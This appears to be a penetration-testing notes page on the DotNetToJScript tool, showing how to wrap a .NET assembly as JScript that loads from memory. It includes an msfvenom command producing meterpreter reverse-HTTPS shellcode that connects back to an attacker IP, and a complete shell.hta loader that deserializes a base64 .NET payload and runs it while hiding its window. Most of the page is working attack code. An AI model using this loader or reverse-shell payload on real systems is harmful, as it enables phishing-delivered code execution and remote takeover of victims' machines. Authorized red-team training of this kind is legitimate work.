DotNetToJscript

A tool to create a JScript file which loads a .NET v2 assembly from memory

Setup

Build TestClass.cs
Copy .exe and .dll from -> C:\Tools\DotNetToJScript-master\DotNetToJScript\bin\Release
Paste -> C:\Tools
Copy .dll from -> C:\Tools\DotNetToJScript-master\ExampleAssembly\bin\Release (or x64 folder -> \ExampleAssembly\bin\x64)
Paste -> C:\Tools (.dll files must be in place when executing a DotNetToJscript program)
cmd.exe C:\Tools
DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o demo.js

Example

In this example meterpreter reverse shellcode is used:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.45.242 LPORT=443 -f csharp

After following the steps in -> Setup, the content of the resulting demo.js file could be placed in a .hta file to execute the JScript (JScript).

shell.hta

<html> 
<head> 
<script language="JScript">
function setversion() {
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
}
function debug(s) {}
function base64ToStream(b) {
	var enc = new ActiveXObject("System.Text.ASCIIEncoding");
	var length = enc.GetByteCount_2(b);
	var ba = enc.GetBytes_4(b);
	var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
	ba = transform.TransformFinalBlock(ba, 0, length);
	var ms = new ActiveXObject("System.IO.MemoryStream");
	ms.Write(ba, 0, (length / 4) * 3);
	ms.Position = 0;
	return ms;
}

var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
. . . 
"AAAAAAAAAAAAAAAAAAAAAQ0AAAAEAAAACRcAAAAJBgAAAAkWAAAABhoAAAAnU3lzdGVtLlJlZmxl"+
"Y3Rpb24uQXNzZW1ibHkgTG9hZChCeXRlW10pCAAAAAoL";
var entry_class = 'TestClass';

try {
	setversion();
	var stm = base64ToStream(serialized_obj);
	var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
	var al = new ActiveXObject('System.Collections.ArrayList');
	var d = fmt.Deserialize_2(stm);
	al.Add(undefined);
	var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
	
} catch (e) {
    debug(e.message);
}
</script>
</head> 
<body>
<script language="JScript">
self.close();
</script>
</body> 
</html>

Tooling

https://github.com/tyranid/DotNetToJScript

Last updated 1 year ago